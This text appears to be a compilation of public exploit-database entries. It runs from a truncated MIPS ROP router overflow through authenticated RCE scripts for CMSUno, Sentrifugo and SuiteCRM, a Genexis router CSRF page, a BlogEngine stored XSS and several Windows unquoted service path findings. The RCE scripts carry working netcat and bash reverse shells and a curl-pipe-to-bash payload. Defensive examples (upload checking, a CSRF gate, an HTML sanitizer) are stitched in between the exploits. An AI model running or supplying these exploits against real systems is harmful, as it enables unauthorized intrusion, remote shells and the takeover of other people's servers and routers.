    0x00039fb8      jalr    t9

    This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28.
    Then as we control s1, we jump to the last and third ROP gadget.

    Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8
    0x000406d8      move    t9, s0
    0x000406dc      jalr    t9

    Jump to the shellcode pointed in s0.
    """

    sleep_addr = "\x2a\xb3\x5c\xa0"
    sleep_gadget = "\x2a\xb2\xe9\x74" 
    stack_gadget = "\x2a\xb1\xbf\xa8"
    call_gadget  = "\x2a\xb2\x26\xd8"

    junk = "J"*28
    payload = "A"*160 + sleep_addr + call_gadget +  sleep_gadget + junk + stack_gadget + shellcode

    p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'}
    url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
    print("[+] Delivering exploit payload to: " + url)
    try:
        r = requests.get(url = url, params=p, headers=h, timeout=10)
    except: 
        print("[+] Finished delivering exploit")


if __name__ == "__main__":
   main(sys.argv[1:])
            
# Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.09.30
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://github.com/boiteasite/cmsuno/
# Software Link: https://github.com/boiteasite/cmsuno/
# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
# Version: 1.6.2
# Tested on: Kali Linux 2020.2

import requests
from bs4 import BeautifulSoup
import lxml
import json

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")

login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"

session = requests.Session()
request = session.get(login_url)

# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login 
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)

# Get the second unox value
request = session.get(login_url)
unox = soup.find("input",{'name':'unox'})['value']

# Exploit
header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Origin": login_url,
"Connection": "close",
"Referer": login_url
}

payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)

while True:
    body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox,payload)
    session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
    request = session.get(login_url)
    text = request.text
    soup = BeautifulSoup(text,"lxml")
    script = soup.findAll('script')[1].string
    data = script.split("Unox='")[1]
    unox = data.split("',")[0]
            
# Exploit Title: Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.10.06
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
# Software Link: https://sourceforge.net/projects/sentrifugo/
# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated.html
# Version: 3.2
# Tested on: Kali Linux 2020.2
# CVE : N/A

import requests
from bs4 import BeautifulSoup
from ast import literal_eval

'''
You should change the below hardcoded inputs to get a reverse shell.
'''

login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/"
username = "xxx"
password = "xxx"

attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"

# Set proxy for debugging purposes

proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

# Log in to the system

session = requests.Session()
request = session.get(login_url)
body = {"username":username,"password":password}
# session.post(login_url, data=body, proxies=proxy) 
session.post(login_url, data=body) # Send a request without proxy
print("Logged in to the application..")

# Upload the PHP shell
files = [
    ('myfile', 
        ('shell.php',
        '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
        'image/jpeg')
    )
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files) # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str) # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))

# Trigger the shell

session.get(url)
            
# Exploit Title: Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.10.06
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
# Software Link: https://sourceforge.net/projects/sentrifugo/
# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated_6.html
# Version: 3.2
# Tested on: Kali Linux 2020.2
# CVE : N/A

import requests
from bs4 import BeautifulSoup
from ast import literal_eval

'''
You should change the below hardcoded inputs to get a reverse shell.
'''

login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
username = "xxxx"
password = "xxxx"

attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"

# Set proxy for debugging purposes

proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

# Log in to the system

session = requests.Session()
request = session.get(login_url)
body = {"username":username,"password":password}
# session.post(login_url, data=body, proxies=proxy) 
session.post(login_url, data=body) # Send a request without proxy
print("Logged in to the application..")

# Upload the PHP shell
files = [
    ('myfile', 
        ('shell.php',
        '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
        'image/jpeg')
    )
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files) # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str) # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))

# Trigger the shell
session.get(url)
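
Both Sentrifugo uploads above send a file named shell.php with a declared type of image/jpeg, so an endpoint that trusts the client's Content-Type or keeps the client's filename stores a script under the web root. The following is an added example of a server-side upload check, not code from Sentrifugo or from the exploit author; the function names and sample uploads are assumptions made for the illustration.

```python
import os
import secrets

# Accepted image types: leading magic bytes and the extensions allowed for each.
ACCEPTED = {
    "image/jpeg": ((b"\xff\xd8\xff",), {".jpg", ".jpeg"}),
    "image/png": ((b"\x89PNG\r\n\x1a\n",), {".png"}),
    "image/gif": ((b"GIF87a", b"GIF89a"), {".gif"}),
}


def sniff_type(content):
    """Return the MIME type implied by the file's first bytes, or None."""
    for mime, (signatures, _exts) in ACCEPTED.items():
        if content.startswith(signatures):
            return mime
    return None


def check_upload(client_name, declared_type, content):
    """Return (accepted, detail); detail is the storage name or the reason."""
    # The client controls both the filename and the Content-Type header, so
    # neither is trusted on its own: the bytes decide what the file is.
    sniffed = sniff_type(content)
    if sniffed is None:
        return False, "content is not a JPEG, PNG or GIF"
    if declared_type != sniffed:
        return False, "declared type %s does not match content %s" % (
            declared_type, sniffed)
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ACCEPTED[sniffed][1]:
        return False, "extension %r not allowed for %s" % (ext, sniffed)
    # Never reuse the client's name: a random name with an allowlisted
    # extension removes directory parts and names such as shell.php.jpg.
    return True, secrets.token_hex(16) + ext


# Constructed sample uploads (the PHP body is a harmless placeholder).
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLES = [
    ("shell.php", "image/jpeg", b"<?php echo 'placeholder'; ?>"),
    ("shell.php", "image/jpeg", JPEG),
    ("../../photo.JPG", "image/jpeg", JPEG),
    ("logo.png", "image/jpeg", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        print(name, ctype, "->", check_upload(name, ctype, body))
```

This check is one layer: the upload directory should also be served without script execution, so that a file that slips through is never interpreted as PHP.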
            
# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
# Date: 28-08-2020
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
# Version: v2.1 (software version P4410-V2-1.28)
# CVE : CVE-2020-25015

1. Description

Platinum 4410 is a compact router from Genexis that is commonly used in homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF, which can be combined to remotely change the WiFi access point’s password.

2. Impact

An attacker can send the victim a link which, if the victim clicks it while connected to the WiFi network served by the vulnerable router, changes the password of the WiFi access point through a CSRF exploit. Because the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

3. Proof of Concept

Create an HTML file with the following code:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
      <input type="hidden" name="wlEnbl" value="ON" />
      <input type="hidden" name="hwlKeys0" value="" />
      <input type="hidden" name="hwlKeys1" value="" />
      <input type="hidden" name="hwlKeys2" value="" />
      <input type="hidden" name="hwlKeys3" value="" />
      <input type="hidden" name="hwlgMode" value="9" />
      <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
      <input type="hidden" name="hwlEnbl" value="1" />
      <input type="hidden" name="hWPSMode" value="1" />
      <input type="hidden" name="henableSsid" value="1" />
      <input type="hidden" name="hwlHide" value="0" />
      <input type="hidden" name="isInWPSing" value="0" />
      <input type="hidden" name="WpsConfModeAll" value="7" />
      <input type="hidden" name="WpsConfModeNone" value="0" />
      <input type="hidden" name="hWpsStart" value="0" />
      <input type="hidden" name="isCUCSupport" value="0" />
      <input type="hidden" name="SSIDPre" value="N&#47;A" />
      <input type="hidden" name="bwControlhidden" value="0" />
      <input type="hidden" name="ht&#95;bw" value="1" />
      <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
      <input type="hidden" name="wlChannel" value="0" />
      <input type="hidden" name="wlTxPwr" value="1" />
      <input type="hidden" name="wlSsidIdx" value="0" />
      <input type="hidden" name="SSID&#95;Flag" value="0" />
      <input type="hidden" name="wlSsid" value="JINSON" />
      <input type="hidden" name="wlMcs" value="33" />
      <input type="hidden" name="bwControl" value="1" />
      <input type="hidden" name="giControl" value="1" />
      <input type="hidden" name="enableSsid" value="on" />
      <input type="hidden" name="wlAssociateNum" value="32" />
      <input type="hidden" name="wlSecurMode" value="WPAand11i" />
      <input type="hidden" name="wlPreauth" value="off" />
      <input type="hidden" name="wlNetReauth" value="1" />
      <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
      <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
      <input type="hidden" name="wlWpaGtkRekey" value="" />
      <input type="hidden" name="wlRadiusIPAddr" value="" />
      <input type="hidden" name="wlRadiusPort" value="" />
      <input type="hidden" name="wlRadiusKey" value="" />
      <input type="hidden" name="wlWpa" value="TKIPAES" />
      <input type="hidden" name="wlKeyBit" value="64" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="WpsActive" value="0" />
      <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
      <input type="hidden" name="pinvalue" value="" />
      <input type="hidden" name="Save&#95;Flag" value="1" />
      <input type="submit" value="Submit request" />
    </form>
     <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD


4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title

5. Timeline

Vulnerability reported to the Genexis team – August 28, 2020
Team confirmed firmware release containing fix – September 14, 2020
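
The PoC works because the settings endpoint accepts a POST with no session and no proof that the form came from the router's own pages. The following is an added example of the server-side gate that stops each step; it is not Genexis firmware code, and the cookie name, the csrf_token field and the other-site origin are assumptions (the form field names are taken from the PoC).

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)     # per-boot secret (assumed)
OWN_ORIGINS = {"http://192.168.1.1"}     # the device's own admin origin
SESSIONS = {}                            # session id -> user name


def csrf_token(sid):
    # Bound to the session, so a page on another origin can neither read
    # nor compute it.
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def login(user):
    """Create a session and return (session_id, csrf_token)."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = user
    return sid, csrf_token(sid)


def request_origin(headers):
    """Origin of the page that sent the request, from Origin or Referer."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    if parts.scheme and parts.netloc:
        return "%s://%s" % (parts.scheme, parts.netloc)
    return None                          # absent, "null" or malformed


def authorize_post(headers, cookies, form):
    """Gate for a state-changing POST. Returns (status, reason)."""
    sid = cookies.get("session")
    if sid not in SESSIONS:              # access control comes first
        return 401, "login required"
    if request_origin(headers) not in OWN_ORIGINS:
        return 403, "cross-origin request"
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), csrf_token(sid).encode()):
        return 403, "missing or wrong CSRF token"
    return 200, "ok"


# Constructed requests shaped like the POST to /cgi-bin/net-wlan.asp.
WLAN_FORM = {"wlSsid": "EXAMPLE", "wlWpaPsk": "constructed-value", "Save_Flag": "1"}


def demo():
    sid, token = login("admin")
    foreign = {"Origin": "http://other-site.example"}
    local = {"Origin": "http://192.168.1.1"}
    return [
        authorize_post(foreign, {}, WLAN_FORM),                # PoC shape
        authorize_post(foreign, {"session": sid}, WLAN_FORM),  # logged-in victim
        authorize_post(local, {"session": sid}, WLAN_FORM),    # token missing
        authorize_post(local, {"session": sid}, dict(WLAN_FORM, csrf_token=token)),
    ]


if __name__ == "__main__":
    for result in demo():
        print(result)
```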
            
# Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS
# Date: 11/2020
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://blogengine.io/
# Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip
# Version: 3.3.8
# Tested on: Windows Server 2016
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html


Stored XSS Reproduction Steps:

1. Log in at http://IP/blogengine/admin/app/editor/editpost.cshtml
2. Add content and trap the POST request in an intercepting proxy
3. Add the XSS payload into the "Content" parameter value
4. Browse to the post to trigger the XSS payload


Example HTTP POST Request:
POST /blogengine/api/posts HTTP/1.1
Host: 192.168.56.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
[..]
{
  "Id": "",
  "Title": "XSS Test",
  "Author": "Admin",
  "Content": "<img src=x onerror=alert(`XSS`)>",
  [..]
  }

Example HTTP Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
[..]
{
  "IsChecked": false,
  "Id": "357ae13d-f230-486a-b2aa-71d67a700083",
  "Title": "XSS Test",
  "Author": "Admin",
  "Description": "",
  "Content": "<img src=x onerror=alert(`XSS`)>",
  [..]
 }
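
The response above shows the API storing the "Content" value unchanged, so the markup runs when the post is rendered. The following is an added example of allowlist sanitization applied before storage or rendering, assuming post bodies must keep some HTML formatting; it is not BlogEngine code, and the allowlist and function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist for post bodies: tag -> attributes that survive.
ALLOWED = {
    "p": (), "br": (), "b": (), "i": (), "em": (), "strong": (),
    "ul": (), "ol": (), "li": (), "blockquote": (), "pre": (), "code": (),
    "a": ("href", "title"), "img": ("src", "alt"),
}
VOID = {"br", "img"}                 # no closing tag is emitted for these
DROP_CONTENT = {"script", "style"}   # tag and everything inside is discarded
SAFE_SCHEMES = {"", "http", "https", "mailto"}


def safe_url(value):
    # Browsers ignore whitespace and control characters inside a scheme,
    # so remove them before looking at it.
    cleaned = "".join(ch for ch in value if ch > " ")
    try:
        return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False


class PostSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue             # drops onerror, onclick, style, ...
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED and tag not in VOID:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def sanitize(content):
    """Re-serialize content, keeping only allowlisted tags and attributes."""
    parser = PostSanitizer()
    parser.feed(content)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # The first value is the "Content" field from the request above.
    for sample in ("<img src=x onerror=alert(`XSS`)>",
                   "<p>Hello <b>world</b></p><script>alert(1)</script>"):
        print(repr(sample), "->", repr(sanitize(sample)))
```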
            
# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.portrait.com/
# Software Link: https://www.portrait.com/dtune/hwp/enu/
# Software Version: 3.20
# File Version: 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path


# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname

DisplayName                             Name    PathName                                                                 StartMode  StartName
Portrait Displays Display Tune Service  DTSRVC  C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "DTSRVC"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DTSRVC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Portrait Displays Display Tune Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem


# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
            
# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE

from requests import Session
from random import choice
from string import ascii_lowercase

url = "http://127.0.0.1/"  # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin"  # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
    prefix=prefix,
    rand=''.join(choice(ascii_lowercase) for _ in range(6))
)

# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)

# Admin login payload
login_data = {
    "module": "Users",
    "action": "Authenticate",
    "return_module": "Users",
    "return_action": "Login",
    "user_name": user_name,
    "username_password": password,
    "Login": "Log+In"
}

# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, file_name),  # Set file extension in the file name as it isn't checked here
    "logger_file_ext": (None, ''),  # Bypasses file extension check by just not setting one.
    "logger_level": (None, "info"),  # This is important for your php code to make it into the logs
    "save": (None, "Save")
}

# Payload to put php code into the malicious log file
poison_log = {
    "module": (None, "Users"),
    "record": (None, "1"),
    "action": (None, "Save"),
    "page": (None, "EditView"),
    "return_action": (None, "DetailView"),
    "user_name": (None, user_name),
    "last_name": (None, command),
}

# Payload to restore the log file settings to default after the exploit runs
restore_log = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, "suitecrm"),  # Default log file name
    "logger_file_ext": (None, ".log"),  # Default log file extension
    "logger_level": (None, "fatal"),  # Default log file setting
    "save": (None, "Save")
}

# Start of exploit
with Session() as s:

    # Authenticating as the administrator
    s.get(post_url, params={'module': 'Users', 'action': 'Login'})
    print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
    s.post(post_url, data=login_data)
    if 'ck_login_id_20' not in s.cookies.get_dict().keys():
        print('[-] Invalid password for: {user}'.format(user=user_name))
        exit(1)
    print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
        user=user_name,
        cookie=s.cookies.get_dict()['PHPSESSID'])
    )

    # Modify the system settings to set logging to 'info' and create a log file in php format
    print('[+] Modifying log level and log file name.')
    print('[+] File name will be: {fname}'.format(fname=file_name))
    settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(post_url, headers=settings_header, files=modify_system_settings_data)

    # Post to update the administrator's last name with php code that will poison the log file
    print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
    command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(url, headers=command_header, files=poison_log)

    # May be a good idea to put a short delay in here to allow your code to make it into the logfile.
    # Up to you though...

    # Do a get request to trigger php code execution.
    print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
    execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
    if not execute_command.ok:
        print('[-] Exploit failed, sorry... Might have to do some modifications.')

    # Restoring log file to default
    print('[+] Setting log back to defaults')
    s.post(post_url, headers=settings_header, files=restore_log)

print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
            
#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Winstep
#Version : WsxService 18.06.0096
#Vendor Homepage :  https://www.winstep.net/xtreme.asp
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc "Winstep Xtreme Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Winstep Xtreme Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Winstep Xtreme Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : KMSpico
#Version : Service_KMS 17.1.0.0
#Vendor Homepage :  https://official-kmspico.com/
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc "Service KMSELDI"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Service KMSELDI
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Service KMSELDI
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.oki.com/
# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
# Software Version: 1.0.41
# File Version: 1.4.2.0
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path


# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname

DisplayName            PathName                                                                           StartMode  StartName
OKI sPSV Port Manager  C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "sPSVOpLclSrv"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: sPSVOpLclSrv
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : OKI sPSV Port Manager
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem


# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
            
#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : HTC
#Version : IPTInstaller 4.0.9
#Vendor Homepage :  https://www.htc.com/latam/
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\Users\DSAZ230>sc qc "PassThru Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PassThru Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Internet Pass-Through Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : DigitalPersona  U. are U. One Touch
#Version : DigitalPersona Pro 4.5.0.2213
#Vendor Homepage :  https://www.hidglobal.com/crossmatch
#Tested on OS: Windows 10 Home

#Analyze PoC :
==============

C:\>sc qc DpHost
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DpHost
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\DigitalPersona\Bin\DpHostW.exe
        GRUPO_ORDEN_CARGA  : BiometricGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Servicio de autenticación biométrica
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Genexus
#Version : Genexus Protection Server 9.6.4.2
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage :  https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

#Analyze PoC :
==============

C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
#Discovery by: Jocelyn Arenas
#Discovery Date: 2020-11-07
#Vendor Homepage: https://www8.hp.com/mx/es/home.html
#Tested Version: 1.4.8.0 
#Vulnerability Type: Unquoted Service Path
#Tested on OS: Windows 10 Home x64 es

# Step to discover Unquoted Service Path:

